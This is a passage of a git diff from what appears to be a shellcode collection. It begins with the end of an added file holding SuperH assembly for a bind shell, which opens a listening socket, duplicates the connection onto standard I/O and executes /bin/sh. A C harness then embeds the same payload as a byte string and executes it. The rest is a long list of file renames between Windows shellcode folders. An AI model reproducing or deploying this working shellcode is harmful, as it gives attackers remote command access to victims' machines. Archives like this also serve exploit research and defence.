mov r0,r4 + mov r0,r8 + xor r2,r2 + mov.l r2,@-r15 + mov #105,r2 + mov.b r2,@-r15 + mov #122,r2 + mov.b r2,@-r15 + xor r2,r2 + mov.b r2,@-r15 + mov #2,r2 + mov.b r2,@-r15 + mov r15,r5 + mov #16,r6 + mov.l r6,@-r15 + mov.l r5,@-r15 + mov.l r4,@-r15 + mov #2,r4 + mov r15,r5 + trapa #19 + mov r8,r4 + xor r5,r5 + xor r6,r6 + mov.l r6,@-r15 + mov.l r5,@-r15 + mov.l r4,@-r15 + mov #4,r4 + mov r15,r5 + trapa #19 + mov r8,r4 + xor r5,r5 + xor r6,r6 + mov.l r6,@-r15 + mov.l r5,@-r15 + mov.l r4,@-r15 + mov #5,r4 + mov r15,r5 + trapa #19 + mov r0,r9 + mov #3,r10 +dup: + add #-1,r10 + mov #63,r3 + mov r9,r4 + mov r10,r5 + trapa #19 + cmp/pl r10 + bt dup + mov #11,r3 + mova @(8,pc),r0 + mov r0,r4 + xor r5,r5 + trapa #19 + .string "///bin/sh" + */ +#include +#include + +char code[] = "\x66\xe3\x02\xe4\x01\xe5\x6a\x26\x66\x2f\x56\x2f\x46\x2f\x01\xe4\xf3\x65\x13\xc3\x03\x64\x03\x68\x2a\x22\x26\x2f\x69\xe2\x24\x2f\x7a\xe2\x24\x2f\x2a\x22\x24\x2f\x02\xe2\x24\x2f\xf3\x65\x10\xe6\x66\x2f\x56\x2f\x46\x2f\x02\xe4\xf3\x65\x13\xc3\x83\x64\x5a\x25\x6a\x26\x66\x2f\x56\x2f\x46\x2f\x04\xe4\xf3\x65\x13\xc3\x83\x64\x5a\x25\x6a\x26\x66\x2f\x56\x2f\x46\x2f\x05\xe4\xf3\x65\x13\xc3\x03\x69\x03\xea\xff\x7a\x3f\xe3\x93\x64\xa3\x65\x13\xc3\x15\x4a\xf8\x89\x0b\xe3\x01\xc7\x03\x64\x5a\x25\x13\xc3\x2f\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x00"; + +int main() +{ + printf("len:%d bytes\n", strlen(code)); + (*(void(*)()) code)(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/win_x86-64/13533.asm b/shellcodes/windows_x86-64/13533.asm similarity index 100% rename from shellcodes/win_x86-64/13533.asm rename to shellcodes/windows_x86-64/13533.asm diff --git a/shellcodes/win_x86-64/13719.txt b/shellcodes/windows_x86-64/13719.txt similarity index 100% rename from shellcodes/win_x86-64/13719.txt rename to shellcodes/windows_x86-64/13719.txt diff --git a/shellcodes/win_x86-64/13729.txt b/shellcodes/windows_x86-64/13729.txt similarity index 100% rename from shellcodes/win_x86-64/13729.txt rename to shellcodes/windows_x86-64/13729.txt diff --git a/shellcodes/win_x86-64/35794.txt b/shellcodes/windows_x86-64/35794.txt similarity index 100% rename from shellcodes/win_x86-64/35794.txt rename to shellcodes/windows_x86-64/35794.txt diff --git a/shellcodes/win_x86-64/37895.asm b/shellcodes/windows_x86-64/37895.asm similarity index 100% rename from shellcodes/win_x86-64/37895.asm rename to shellcodes/windows_x86-64/37895.asm diff --git a/shellcodes/win_x86-64/40549.c b/shellcodes/windows_x86-64/40549.c similarity index 100% rename from shellcodes/win_x86-64/40549.c rename to shellcodes/windows_x86-64/40549.c diff --git a/shellcodes/win_x86-64/40781.c b/shellcodes/windows_x86-64/40781.c similarity index 100% rename from shellcodes/win_x86-64/40781.c rename to shellcodes/windows_x86-64/40781.c diff --git a/shellcodes/win_x86-64/40821.c b/shellcodes/windows_x86-64/40821.c similarity index 100% rename from shellcodes/win_x86-64/40821.c rename to shellcodes/windows_x86-64/40821.c diff --git a/shellcodes/win_x86-64/40890.c b/shellcodes/windows_x86-64/40890.c similarity index 100% rename from shellcodes/win_x86-64/40890.c rename to shellcodes/windows_x86-64/40890.c diff --git a/shellcodes/win_x86-64/40981.c b/shellcodes/windows_x86-64/40981.c similarity index 100% rename from shellcodes/win_x86-64/40981.c rename to shellcodes/windows_x86-64/40981.c diff --git a/shellcodes/win_x86-64/41072.c b/shellcodes/windows_x86-64/41072.c similarity index 100% rename from shellcodes/win_x86-64/41072.c rename to shellcodes/windows_x86-64/41072.c diff --git a/shellcodes/win_x86-64/41827.txt b/shellcodes/windows_x86-64/41827.txt similarity index 100% rename from shellcodes/win_x86-64/41827.txt rename to shellcodes/windows_x86-64/41827.txt diff --git a/shellcodes/win_x86-64/42992.c b/shellcodes/windows_x86-64/42992.c similarity index 100% rename from shellcodes/win_x86-64/42992.c rename to shellcodes/windows_x86-64/42992.c diff --git a/shellcodes/win_x86/13504.asm b/shellcodes/windows_x86/13504.asm similarity index 100% rename from shellcodes/win_x86/13504.asm rename to shellcodes/windows_x86/13504.asm diff --git a/shellcodes/win_x86/13505.c b/shellcodes/windows_x86/13505.c similarity index 100% rename from shellcodes/win_x86/13505.c rename to shellcodes/windows_x86/13505.c diff --git a/shellcodes/win_x86/13507.txt b/shellcodes/windows_x86/13507.txt similarity index 100% rename from shellcodes/win_x86/13507.txt rename to shellcodes/windows_x86/13507.txt diff --git a/shellcodes/win_x86/13508.asm b/shellcodes/windows_x86/13508.asm similarity index 100% rename from shellcodes/win_x86/13508.asm rename to shellcodes/windows_x86/13508.asm diff --git a/shellcodes/win_x86/13509.c b/shellcodes/windows_x86/13509.c similarity index 100% rename from shellcodes/win_x86/13509.c rename to shellcodes/windows_x86/13509.c diff --git a/shellcodes/win_x86/13510.c b/shellcodes/windows_x86/13510.c similarity index 100% rename from shellcodes/win_x86/13510.c rename to shellcodes/windows_x86/13510.c diff --git a/shellcodes/win_x86/13511.c b/shellcodes/windows_x86/13511.c similarity index 100% rename from shellcodes/win_x86/13511.c rename to shellcodes/windows_x86/13511.c diff --git a/shellcodes/win_x86/13512.c b/shellcodes/windows_x86/13512.c similarity index 100% rename from shellcodes/win_x86/13512.c rename to shellcodes/windows_x86/13512.c diff --git a/shellcodes/win_x86/13513.c b/shellcodes/windows_x86/13513.c similarity index 100% rename from shellcodes/win_x86/13513.c rename to shellcodes/windows_x86/13513.c diff --git a/shellcodes/win_x86/13514.asm b/shellcodes/windows_x86/13514.asm similarity index 100% rename from shellcodes/win_x86/13514.asm rename to shellcodes/windows_x86/13514.asm diff --git a/shellcodes/win_x86/13516.asm b/shellcodes/windows_x86/13516.asm similarity index 100% rename from shellcodes/win_x86/13516.asm rename to shellcodes/windows_x86/13516.asm diff --git a/shellcodes/win_x86/13517.asm b/shellcodes/windows_x86/13517.asm similarity index 100% rename from shellcodes/win_x86/13517.asm rename to shellcodes/windows_x86/13517.asm diff --git a/shellcodes/win_x86/13518.c b/shellcodes/windows_x86/13518.c similarity index 100% rename from shellcodes/win_x86/13518.c rename to shellcodes/windows_x86/13518.c diff --git a/shellcodes/win_x86/13519.c b/shellcodes/windows_x86/13519.c similarity index 100% rename from shellcodes/win_x86/13519.c rename to shellcodes/windows_x86/13519.c diff --git a/shellcodes/win_x86/13520.c b/shellcodes/windows_x86/13520.c similarity index 100% rename from shellcodes/win_x86/13520.c rename to shellcodes/windows_x86/13520.c diff --git a/shellcodes/win_x86/13521.asm b/shellcodes/windows_x86/13521.asm similarity index 100% rename from shellcodes/win_x86/13521.asm rename to shellcodes/windows_x86/13521.asm diff --git a/shellcodes/win_x86/13522.c b/shellcodes/windows_x86/13522.c similarity index 100% rename from shellcodes/win_x86/13522.c rename to shellcodes/windows_x86/13522.c diff --git a/shellcodes/win_x86/13523.c b/shellcodes/windows_x86/13523.c similarity index 100% rename from shellcodes/win_x86/13523.c rename to shellcodes/windows_x86/13523.c diff --git a/shellcodes/win_x86/13524.txt b/shellcodes/windows_x86/13524.txt similarity index 100% rename from shellcodes/win_x86/13524.txt rename to shellcodes/windows_x86/13524.txt diff --git a/shellcodes/win_x86/13525.c b/shellcodes/windows_x86/13525.c similarity index 100% rename from shellcodes/win_x86/13525.c rename to shellcodes/windows_x86/13525.c diff --git a/shellcodes/win_x86/13526.c b/shellcodes/windows_x86/13526.c similarity index 100% rename from shellcodes/win_x86/13526.c rename to shellcodes/windows_x86/13526.c diff --git a/shellcodes/win_x86/13527.c b/shellcodes/windows_x86/13527.c similarity index 100% rename from shellcodes/win_x86/13527.c rename to shellcodes/windows_x86/13527.c diff --git a/shellcodes/win_x86/13529.c b/shellcodes/windows_x86/13529.c similarity index 100% rename from shellcodes/win_x86/13529.c rename to shellcodes/windows_x86/13529.c diff --git a/shellcodes/win_x86/13530.asm b/shellcodes/windows_x86/13530.asm similarity index 100% rename from shellcodes/win_x86/13530.asm rename to shellcodes/windows_x86/13530.asm diff --git a/shellcodes/win_x86/13531.c b/shellcodes/windows_x86/13531.c similarity index 100% rename from shellcodes/win_x86/13531.c rename to shellcodes/windows_x86/13531.c diff --git a/shellcodes/win_x86/13532.asm b/shellcodes/windows_x86/13532.asm similarity index 100% rename from shellcodes/win_x86/13532.asm rename to shellcodes/windows_x86/13532.asm diff --git a/shellcodes/win_x86/13565.asm b/shellcodes/windows_x86/13565.asm similarity index 100% rename from shellcodes/win_x86/13565.asm rename to shellcodes/windows_x86/13565.asm diff --git a/shellcodes/win_x86/13569.asm b/shellcodes/windows_x86/13569.asm similarity index 100% rename from shellcodes/win_x86/13569.asm rename to shellcodes/windows_x86/13569.asm diff --git a/shellcodes/win_x86/13571.c b/shellcodes/windows_x86/13571.c similarity index 100% rename from shellcodes/win_x86/13571.c rename to shellcodes/windows_x86/13571.c diff --git a/shellcodes/win_x86/13574.c b/shellcodes/windows_x86/13574.c similarity index 100% rename from shellcodes/win_x86/13574.c rename to shellcodes/windows_x86/13574.c diff --git a/shellcodes/win_x86/13595.c b/shellcodes/windows_x86/13595.c similarity index 100% rename from shellcodes/win_x86/13595.c rename to shellcodes/windows_x86/13595.c diff --git a/shellcodes/win_x86/13614.c b/shellcodes/windows_x86/13614.c similarity index 100% rename from shellcodes/win_x86/13614.c rename to shellcodes/windows_x86/13614.c diff --git a/shellcodes/win_x86/13615.c b/shellcodes/windows_x86/13615.c similarity index 100% rename from shellcodes/win_x86/13615.c rename to shellcodes/windows_x86/13615.c diff --git a/shellcodes/win_x86/13630.c b/shellcodes/windows_x86/13630.c similarity index 100% rename from shellcodes/win_x86/13630.c rename to shellcodes/windows_x86/13630.c diff --git a/shellcodes/win_x86/13631.c b/shellcodes/windows_x86/13631.c similarity index 100% rename from shellcodes/win_x86/13631.c rename to shellcodes/windows_x86/13631.c diff --git a/shellcodes/win_x86/13635.txt b/shellcodes/windows_x86/13635.txt similarity index 100% rename from shellcodes/win_x86/13635.txt rename to shellcodes/windows_x86/13635.txt diff --git a/shellcodes/win_x86/13636.c b/shellcodes/windows_x86/13636.c similarity index 100% rename from shellcodes/win_x86/13636.c rename to shellcodes/windows_x86/13636.c diff --git a/shellcodes/win_x86/13639.c b/shellcodes/windows_x86/13639.c similarity index 100% rename from shellcodes/win_x86/13639.c rename to shellcodes/windows_x86/13639.c diff --git a/shellcodes/win_x86/13642.txt b/shellcodes/windows_x86/13642.txt similarity index 100% rename from shellcodes/win_x86/13642.txt rename to shellcodes/windows_x86/13642.txt diff --git a/shellcodes/win_x86/13647.txt b/shellcodes/windows_x86/13647.txt similarity index 100% rename from shellcodes/win_x86/13647.txt rename to shellcodes/windows_x86/13647.txt diff --git a/shellcodes/win_x86/13648.rb b/shellcodes/windows_x86/13648.rb similarity index 100% rename from shellcodes/win_x86/13648.rb rename to shellcodes/windows_x86/13648.rb diff --git a/shellcodes/win_x86/13699.txt b/shellcodes/windows_x86/13699.txt similarity index 100% rename from shellcodes/win_x86/13699.txt rename to shellcodes/windows_x86/13699.txt diff --git a/shellcodes/win_x86/14014.pl b/shellcodes/windows_x86/14014.pl similarity index 100% rename from shellcodes/win_x86/14014.pl rename to shellcodes/windows_x86/14014.pl diff --git a/shellcodes/win_x86/14288.asm b/shellcodes/windows_x86/14288.asm similarity index 100% rename from shellcodes/win_x86/14288.asm rename to shellcodes/windows_x86/14288.asm diff --git a/shellcodes/win_x86/14873.asm b/shellcodes/windows_x86/14873.asm similarity index 100% rename from shellcodes/win_x86/14873.asm rename to shellcodes/windows_x86/14873.asm diff --git a/shellcodes/win_x86/15063.c b/shellcodes/windows_x86/15063.c similarity index 100% rename from shellcodes/win_x86/15063.c rename to shellcodes/windows_x86/15063.c diff --git a/shellcodes/win_x86/15202.c b/shellcodes/windows_x86/15202.c similarity index 100% rename from shellcodes/win_x86/15202.c rename to shellcodes/windows_x86/15202.c diff --git a/shellcodes/win_x86/15203.c b/shellcodes/windows_x86/15203.c similarity index 100% rename from shellcodes/win_x86/15203.c rename to shellcodes/windows_x86/15203.c diff --git a/shellcodes/win_x86/15879.txt b/shellcodes/windows_x86/15879.txt similarity index 100% rename from shellcodes/win_x86/15879.txt rename to shellcodes/windows_x86/15879.txt diff --git a/shellcodes/win_x86/16283.txt b/shellcodes/windows_x86/16283.txt similarity index 100% rename from shellcodes/win_x86/16283.txt rename to shellcodes/windows_x86/16283.txt diff --git a/shellcodes/win_x86/17545.txt b/shellcodes/windows_x86/17545.txt similarity index 100% rename from shellcodes/win_x86/17545.txt rename to shellcodes/windows_x86/17545.txt diff --git a/shellcodes/win_x86/35793.txt b/shellcodes/windows_x86/35793.txt similarity index 100% rename from shellcodes/win_x86/35793.txt rename to shellcodes/windows_x86/35793.txt diff --git a/shellcodes/win_x86/36779.c b/shellcodes/windows_x86/36779.c similarity index 100% rename from shellcodes/win_x86/36779.c rename to shellcodes/windows_x86/36779.c diff --git a/shellcodes/win_x86/36780.c b/shellcodes/windows_x86/36780.c similarity index 100% rename from shellcodes/win_x86/36780.c rename to shellcodes/windows_x86/36780.c diff --git a/shellcodes/win_x86/37664.c b/shellcodes/windows_x86/37664.c similarity index 100% rename from shellcodes/win_x86/37664.c rename to shellcodes/windows_x86/37664.c diff --git a/shellcodes/win_x86/37758.c b/shellcodes/windows_x86/37758.c similarity index 100% rename from shellcodes/win_x86/37758.c rename to shellcodes/windows_x86/37758.c diff --git a/shellcodes/win_x86/39519.c b/shellcodes/windows_x86/39519.c similarity index 100% rename from shellcodes/win_x86/39519.c rename to shellcodes/windows_x86/39519.c diff --git a/shellcodes/win_x86/39754.txt b/shellcodes/windows_x86/39754.txt similarity index 100% rename from shellcodes/win_x86/39754.txt rename to shellcodes/windows_x86/39754.txt diff --git a/shellcodes/win_x86/39900.c b/shellcodes/windows_x86/39900.c similarity index 100% rename from shellcodes/win_x86/39900.c rename to shellcodes/windows_x86/39900.c diff --git a/shellcodes/win_x86/39914.c b/shellcodes/windows_x86/39914.c similarity index 100% rename from shellcodes/win_x86/39914.c rename to shellcodes/windows_x86/39914.c diff --git a/shellcodes/win_x86/40005.c b/shellcodes/windows_x86/40005.c similarity index 100% rename from shellcodes/win_x86/40005.c rename to shellcodes/windows_x86/40005.c diff --git a/shellcodes/win_x86/40094.c b/shellcodes/windows_x86/40094.c similarity index 100% rename from shellcodes/win_x86/40094.c rename to shellcodes/windows_x86/40094.c diff --git a/shellcodes/win_x86/40175.c b/shellcodes/windows_x86/40175.c similarity index 100% rename from shellcodes/win_x86/40175.c rename to shellcodes/windows_x86/40175.c diff --git a/shellcodes/win_x86/40245.c b/shellcodes/windows_x86/40245.c similarity index 100% rename from shellcodes/win_x86/40245.c rename to shellcodes/windows_x86/40245.c diff --git a/shellcodes/win_x86/40246.c b/shellcodes/windows_x86/40246.c similarity index 100% rename from shellcodes/win_x86/40246.c rename to shellcodes/windows_x86/40246.c diff --git a/shellcodes/win_x86/40259.c b/shellcodes/windows_x86/40259.c similarity index 100% rename from shellcodes/win_x86/40259.c rename to shellcodes/windows_x86/40259.c diff --git a/shellcodes/win_x86/40334.c b/shellcodes/windows_x86/40334.c similarity index 100% rename from shellcodes/win_x86/40334.c rename to shellcodes/windows_x86/40334.c diff --git a/shellcodes/win_x86/40352.c b/shellcodes/windows_x86/40352.c similarity index 100% rename from shellcodes/win_x86/40352.c rename to shellcodes/windows_x86/40352.c diff --git a/shellcodes/win_x86/40363.c b/shellcodes/windows_x86/40363.c similarity index 100% rename from shellcodes/win_x86/40363.c rename to shellcodes/windows_x86/40363.c diff --git a/shellcodes/win_x86/40560.asm b/shellcodes/windows_x86/40560.asm similarity index 100% rename from shellcodes/win_x86/40560.asm rename to shellcodes/windows_x86/40560.asm diff --git a/shellcodes/win_x86/41381.c b/shellcodes/windows_x86/41381.c similarity index 100% rename from shellcodes/win_x86/41381.c rename to shellcodes/windows_x86/41381.c diff --git a/shellcodes/win_x86/41467.c b/shellcodes/windows_x86/41467.c similarity index 100% rename from shellcodes/win_x86/41467.c rename to shellcodes/windows_x86/41467.c diff --git a/shellcodes/win_x86/41481.asm b/shellcodes/windows_x86/41481.asm similarity index 100% rename from shellcodes/win_x86/41481.asm rename to shellcodes/windows_x86/41481.asm diff --git a/shellcodes/win_x86/41581.c b/shellcodes/windows_x86/41581.c similarity index 100% rename from shellcodes/win_x86/41581.c rename to shellcodes/windows_x86/41581.c